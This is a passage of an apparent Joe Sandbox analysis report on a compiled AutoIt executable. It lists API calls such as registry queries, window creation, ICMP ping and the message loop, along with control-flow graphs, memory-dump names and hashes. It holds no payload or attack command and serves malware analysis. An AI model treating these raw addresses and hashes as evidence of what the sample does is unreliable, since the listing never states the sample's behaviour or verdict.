                                                      • Part of subcall function 00F100CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F03094), ref: 00F100ED
                                                      • Part of subcall function 00F108C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F0309F), ref: 00F108E3
                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F030E2
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F401BA
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F401FB
                                                    • RegCloseKey.ADVAPI32(?), ref: 00F40239
                                                    • _wcscat.LIBCMT ref: 00F40292
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 2673923337-2727554177
                                                    • Opcode ID: 9fcd86cd92d912508312cf4c8be5f76887bfb3757398062cc30254216e4b9774
                                                    • Instruction ID: e34f8c91687ded1d495f806e77ae3790a5954699d03a1e8d13ba98aaa0410678
                                                    • Opcode Fuzzy Hash: 9fcd86cd92d912508312cf4c8be5f76887bfb3757398062cc30254216e4b9774
                                                    • Instruction Fuzzy Hash: 447148715093059EC714EF65EC859ABBBACFF88390B40062EF545822A1EF70994AEF52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F05156
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F05165
                                                    • LoadIconW.USER32(00000063), ref: 00F0517C
                                                    • LoadIconW.USER32(000000A4), ref: 00F0518E
                                                    • LoadIconW.USER32(000000A2), ref: 00F051A0
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F051C6
                                                    • RegisterClassExW.USER32(?), ref: 00F0521C
                                                      • Part of subcall function 00EF3411: GetSysColorBrush.USER32(0000000F), ref: 00EF3444
                                                      • Part of subcall function 00EF3411: RegisterClassExW.USER32(00000030), ref: 00EF346E
                                                      • Part of subcall function 00EF3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
                                                      • Part of subcall function 00EF3411: InitCommonControlsEx.COMCTL32(?), ref: 00EF349C
                                                      • Part of subcall function 00EF3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EF34AC
                                                      • Part of subcall function 00EF3411: LoadIconW.USER32(000000A9), ref: 00EF34C2
                                                      • Part of subcall function 00EF3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EF34D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 1aedb550e6a512cd77abfe58d47f91f70efb11bcc8b39d8f0c81807d6ade43b2
                                                    • Instruction ID: 0f199b0ec45ad6fbc6fbb966b652be1e3e666892da6af431bb02687cbfef02c2
                                                    • Opcode Fuzzy Hash: 1aedb550e6a512cd77abfe58d47f91f70efb11bcc8b39d8f0c81807d6ade43b2
                                                    • Instruction Fuzzy Hash: A6214B71D0430DAFEB11AFA4ED89B9D7BB4FB48710F000259F604A62A0D7B65954EF84

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 712 f65e1d-f65e54 call ef4dc0 715 f65e56-f65e63 call ef502b 712->715 716 f65e74-f65e86 WSAStartup 712->716 715->716 724 f65e65-f65e70 call ef502b 715->724 718 f65e9d-f65edb call f040cd call ef4d37 call f0402a inet_addr gethostbyname 716->718 719 f65e88-f65e98 call f47135 716->719 733 f65eec-f65efc call f47135 718->733 734 f65edd-f65eea IcmpCreateFile 718->734 728 f65ff6-f65ffe 719->728 724->716 739 f65fed-f65ff1 call f01cb6 733->739 734->733 735 f65f01-f65f32 call f10fe6 call f0433f 734->735 744 f65f34-f65f53 IcmpSendEcho 735->744 745 f65f55-f65f69 IcmpSendEcho 735->745 739->728 746 f65f6d-f65f6f 744->746 745->746 747 f65fa2-f65fa4 746->747 748 f65f71-f65f76 746->748 751 f65fa6-f65fb2 call f47135 747->751 749 f65fba-f65fcc call ef4dc0 748->749 750 f65f78-f65f7d 748->750 759 f65fd2 749->759 760 f65fce-f65fd0 749->760 752 f65fb4-f65fb8 750->752 753 f65f7f-f65f84 750->753 763 f65fd4-f65fe8 IcmpCloseHandle WSACleanup call f045ae 751->763 752->751 753->747 757 f65f86-f65f8b 753->757 761 f65f8d-f65f92 757->761 762 f65f9a-f65fa0 757->762 759->763 760->763 761->752 765 f65f94-f65f98 761->765 762->751 763->739 765->751
                                                    APIs
                                                    • WSAStartup.WS2_32(00000101,?), ref: 00F65E7E
                                                    • inet_addr.WSOCK32(?,?,?), ref: 00F65EC3
                                                    • gethostbyname.WS2_32(?), ref: 00F65ECF
                                                    • IcmpCreateFile.IPHLPAPI ref: 00F65EDD
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F65F4D
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F65F63
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F65FD8
                                                    • WSACleanup.WSOCK32 ref: 00F65FDE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: aa065a74b5e7cbd5026cff165bbb7674445aa2840130057f81e650da6aeeb725
                                                    • Instruction ID: 5f6151ba8d6f13d15eadcf08d6a891449a47a868d28e69ff117b84f8790c9c48
                                                    • Opcode Fuzzy Hash: aa065a74b5e7cbd5026cff165bbb7674445aa2840130057f81e650da6aeeb725
                                                    • Instruction Fuzzy Hash: EB5150716046019FD720EF24CD49B6AB7E4EF48B20F144529FA96EB2E1DB74E904EB42

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 766 f04d83-f04dd1 768 f04e31-f04e33 766->768 769 f04dd3-f04dd6 766->769 768->769 770 f04e35 768->770 771 f04e37 769->771 772 f04dd8-f04ddf 769->772 773 f04e1a-f04e22 DefWindowProcW 770->773 774 f409c2-f409f0 call efc460 call efc483 771->774 775 f04e3d-f04e40 771->775 776 f04de5-f04dea 772->776 777 f04ead-f04eb5 PostQuitMessage 772->777 778 f04e28-f04e2e 773->778 809 f409f5-f409fc 774->809 780 f04e42-f04e43 775->780 781 f04e65-f04e8c SetTimer RegisterWindowMessageW 775->781 782 f04df0-f04df2 776->782 783 f40a35-f40a49 call f52cce 776->783 779 f04e61-f04e63 777->779 779->778 785 f40965-f40968 780->785 786 f04e49-f04e5c KillTimer call f05ac3 call ef34e4 780->786 781->779 787 f04e8e-f04e99 CreatePopupMenu 781->787 788 f04eb7-f04ec1 call f05b29 782->788 789 f04df8-f04dfd 782->789 783->779 800 f40a4f 783->800 794 f4099e-f409bd MoveWindow 785->794 795 f4096a-f4096c 785->795 786->779 787->779 802 f04ec6 788->802 797 f04e03-f04e08 789->797 798 f40a1a-f40a21 789->798 794->779 803 f4098d-f40999 SetFocus 795->803 804 f4096e-f40971 795->804 807 f04e9b-f04eab call f05bd7 797->807 808 f04e0e-f04e14 797->808 798->773 806 f40a27-f40a30 call f48854 798->806 800->773 802->779 803->779 804->808 810 f40977-f40988 call efc460 804->810 806->773 807->779 808->773 808->809 809->773 815 f40a02-f40a15 call f05ac3 call f059d3 809->815 810->779 815->773
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00F04E22
                                                    • KillTimer.USER32(?,00000001), ref: 00F04E4C
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F04E6F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F04E7A
                                                    • CreatePopupMenu.USER32 ref: 00F04E8E
                                                    • PostQuitMessage.USER32(00000000), ref: 00F04EAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: 63fe0e3acd327960d1ba0cf3ee1054aff0292673ac87dbe7c6eed491fe389ad0
                                                    • Instruction ID: 685716023266ccc4fb91e162828dbd055932084aa08a0aa7ae2400c330120c4a
                                                    • Opcode Fuzzy Hash: 63fe0e3acd327960d1ba0cf3ee1054aff0292673ac87dbe7c6eed491fe389ad0
                                                    • Instruction Fuzzy Hash: 3441F5B260820EABDB556F24DC49BBE7A95FB80311F140625FB01922E2DE75BC50BF61

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F40C5B
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • _memset.LIBCMT ref: 00F05787
                                                    • _wcscpy.LIBCMT ref: 00F057DB
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F057EB
                                                    • __swprintf.LIBCMT ref: 00F40CD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                    • String ID: Line %d: $AutoIt -
                                                    • API String ID: 230667853-4094128768
                                                    • Opcode ID: c6376e3c54ef3c8e9bbb443a43ea1fcdb43d0abd309ddb5abb8d340ac2c91cf7
                                                    • Instruction ID: 933a36bf5bcc6edcf19338100530c8a978dde6f06c58b4074833296954e0a1bc
                                                    • Opcode Fuzzy Hash: c6376e3c54ef3c8e9bbb443a43ea1fcdb43d0abd309ddb5abb8d340ac2c91cf7
                                                    • Instruction Fuzzy Hash: 91419171508309AAD321EB60DC85BDF77DCAF84360F004A1AF585921E1EF78E648FB96

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1060 f050db-f0514b CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F05109
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F0512A
                                                    • ShowWindow.USER32(00000000), ref: 00F0513E
                                                    • ShowWindow.USER32(00000000), ref: 00F05147
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: ce4f4f96052805523f3eaabfc89233cd19e804a08c7a07133d53109ec09a657f
                                                    • Instruction ID: 3cb1eab77878b76e1aa7bd98c9a86ab96f92f5e5c78bfd118a3bd7bac561163b
                                                    • Opcode Fuzzy Hash: ce4f4f96052805523f3eaabfc89233cd19e804a08c7a07133d53109ec09a657f
                                                    • Instruction Fuzzy Hash: 07F0DA715453987EEB712727AC88E773E7DD7C7F50F00021AB900A22B1CA651851EEB0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1061 f59b16-f59b9b call f04a8c call f59cf1 1066 f59ba5-f59c5c call f04ab2 * 4 call f04a8c call f1593c * 2 call f04ab2 call f596c4 call f58f0e 1061->1066 1067 f59b9d 1061->1067 1090 f59c73-f59c77 1066->1090 1091 f59c5e-f59c6e call f12f85 * 2 1066->1091 1068 f59b9f-f59ba0 1067->1068 1070 f59ce8-f59cee 1068->1070 1092 f59c79-f59cd1 call f590c1 call f12f85 1090->1092 1093 f59cd8-f59cde call f12f85 1090->1093 1091->1068 1104 f59cd6 1092->1104 1103 f59ce0-f59ce6 1093->1103 1103->1070 1104->1103
                                                    APIs
                                                      • Part of subcall function 00F04A8C: _fseek.LIBCMT ref: 00F04AA4
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DE1
                                                      • Part of subcall function 00F59CF1: _wcscmp.LIBCMT ref: 00F59DF4
                                                    • _free.LIBCMT ref: 00F59C5F
                                                    • _free.LIBCMT ref: 00F59C66
                                                    • _free.LIBCMT ref: 00F59CD1
                                                      • Part of subcall function 00F12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12F99
                                                      • Part of subcall function 00F12F85: GetLastError.KERNEL32(00000000,?,00F19C54,00000000,00F18D5D,00F159C3), ref: 00F12FAB
                                                    • _free.LIBCMT ref: 00F59CD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 1552873950-2806939583
                                                    • Opcode ID: debd864d0832de9cd9e76fbd25f8ca32b63088750f9d48d753cdc5132f29438d
                                                    • Instruction ID: 9f6a2fc532cc9e4435fba6c37d7d541030a81ea30dd9b143858609dd00e49e39
                                                    • Opcode Fuzzy Hash: debd864d0832de9cd9e76fbd25f8ca32b63088750f9d48d753cdc5132f29438d
                                                    • Instruction Fuzzy Hash: 41514CB1E04219EFDF24DF64DC45AAEBBB9FF48304F00049EB649A3281DB755A849F58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1105 f1563d-f15656 1106 f15673 1105->1106 1107 f15658-f1565d 1105->1107 1108 f15675-f1567b 1106->1108 1107->1106 1109 f1565f-f15661 1107->1109 1110 f15663-f15668 call f18d58 1109->1110 1111 f1567c-f15681 1109->1111 1123 f1566e call f18fe6 1110->1123 1112 f15683-f1568d 1111->1112 1113 f1568f-f15693 1111->1113 1112->1113 1115 f156b3-f156c2 1112->1115 1116 f156a3-f156a5 1113->1116 1117 f15695-f156a0 call f13010 1113->1117 1121 f156c4-f156c7 1115->1121 1122 f156c9 1115->1122 1116->1110 1120 f156a7-f156b1 1116->1120 1117->1116 1120->1110 1120->1115 1126 f156ce-f156d3 1121->1126 1122->1126 1123->1106 1127 f156d9-f156e0 1126->1127 1128 f157bc-f157bf 1126->1128 1129 f15721-f15723 1127->1129 1130 f156e2-f156ea 1127->1130 1128->1108 1132 f15725-f15727 1129->1132 1133 f1578d-f1578e call f20dd7 1129->1133 1130->1129 1131 f156ec 1130->1131 1134 f156f2-f156f4 1131->1134 1135 f157ea 1131->1135 1136 f15729-f15731 1132->1136 1137 f1574b-f15756 1132->1137 1144 f15793-f15797 1133->1144 1139 f156f6-f156f8 1134->1139 1140 f156fb-f15700 1134->1140 1141 f157ee-f157f7 1135->1141 1142 f15741-f15745 1136->1142 1143 f15733-f1573f 1136->1143 1145 f15758 1137->1145 1146 f1575a-f1575d 1137->1146 1139->1140 1147 f157c4-f157c8 1140->1147 1149 f15706-f1571f call f20ef8 1140->1149 1141->1108 1150 f15747-f15749 1142->1150 1143->1150 1144->1141 1151 f15799-f1579e 1144->1151 1145->1146 1146->1147 1148 f1575f-f1576b call f14906 call f2108b 1146->1148 1152 f157da-f157e5 call f18d58 1147->1152 1153 f157ca-f157d7 call f13010 1147->1153 1166 f15770-f15775 1148->1166 1165 f15782-f1578b 1149->1165 1150->1146 1151->1147 1156 f157a0-f157b1 1151->1156 1152->1123 1153->1152 1161 f157b4-f157b6 1156->1161 1161->1127 1161->1128 1165->1161 1167 f1577b-f1577e 1166->1167 1168 f157fc-f15800 1166->1168 1167->1135 1169 f15780 1167->1169 1168->1141 1169->1165
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                    • Instruction ID: b2cbe457308f6b00fa9115ba835eae9671d101e1260bf33628769bc1d0d10794
                                                    • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                    • Instruction Fuzzy Hash: 4351C531E00B09DBDB249F69D8816EE77A5AF80B30F248729F835962D0D7749DD0BB80

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1170 ef52b0-ef52c0 1171 ef52c6-ef52cd 1170->1171 1172 f2df28-f2df2f 1170->1172 1173 f2df3a-f2df41 1171->1173 1174 ef52d3-ef52ea PeekMessageW 1171->1174 1175 ef530c 1172->1175 1176 f2df35 1172->1176 1173->1175 1177 f2df47 1173->1177 1179 ef52ec-ef52f4 1174->1179 1180 ef5313-ef5317 1174->1180 1178 ef530e-ef5312 1175->1178 1176->1173 1187 f2df4c-f2df52 1177->1187 1183 ef52fa-ef5306 1179->1183 1184 f2dfab-f2dfbc 1179->1184 1181 ef531d-ef5326 1180->1181 1182 f2df95-f2df9c 1180->1182 1181->1187 1188 ef532c-ef533c call ef359e 1181->1188 1182->1184 1185 ef5368-ef536d 1183->1185 1186 ef5308-ef530a 1183->1186 1185->1178 1186->1175 1189 ef536f-ef5374 1186->1189 1190 f2df86 1187->1190 1191 f2df54-f2df60 1187->1191 1196 ef533e-ef534e PeekMessageW 1188->1196 1197 ef5352-ef5366 TranslateMessage DispatchMessageW 1188->1197 1189->1178 1190->1182 1191->1190 1193 f2df62-f2df66 1191->1193 1193->1190 1195 f2df68-f2df7b TranslateAcceleratorW 1193->1195 1195->1196 1198 f2df81 1195->1198 1196->1179 1199 ef5350 1196->1199 1197->1196 1198->1188 1199->1180
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF52E6
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF534A
                                                    • TranslateMessage.USER32(?), ref: 00EF5356
                                                    • DispatchMessageW.USER32(?), ref: 00EF5360
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: 0109c6da648520733265fffba680f6b13140a86951e39307336f999a370f3003
                                                    • Instruction ID: 0fcdb3bbbf7b665136250208741811a17b6294f01d4765b4667f5f76b1d9e17f
                                                    • Opcode Fuzzy Hash: 0109c6da648520733265fffba680f6b13140a86951e39307336f999a370f3003
                                                    • Instruction Fuzzy Hash: 2531683290870E9BEB309B68DC84FF977F89B61308F201259E312A71E0D7B59884FB11
                                                    APIs
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F107EC
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F107F4
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F107FF
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F1080A
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F10812
                                                      • Part of subcall function 00F107BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1081A
                                                      • Part of subcall function 00F0FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EFAC6B), ref: 00F0FFA7
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EFAD08
                                                    • OleInitialize.OLE32(00000000), ref: 00EFAD85
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F32F56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: h
                                                    • API String ID: 1986988660-3415971826
                                                    • Opcode ID: 0720e7b7a83f95712fb8a06d343afdcfb7b2fc21f093e127345f8d1e739a5dbb
                                                    • Instruction ID: dd29163c76d3cf323ffdc5b428ce0646ec103e2bc3114985e5eec7d8427a1137
                                                    • Opcode Fuzzy Hash: 0720e7b7a83f95712fb8a06d343afdcfb7b2fc21f093e127345f8d1e739a5dbb
                                                    • Instruction Fuzzy Hash: 4B8199B0909348CEC394FF2AADC56967FE5FBC8306724866AD419D72B2EB345404BF51
                                                    APIs
                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00EF1275,SwapMouseButtons,00000004,?), ref: 00EF12A8
                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00EF1275,SwapMouseButtons,00000004,?), ref: 00EF12C9
                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00EF1275,SwapMouseButtons,00000004,?), ref: 00EF12EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
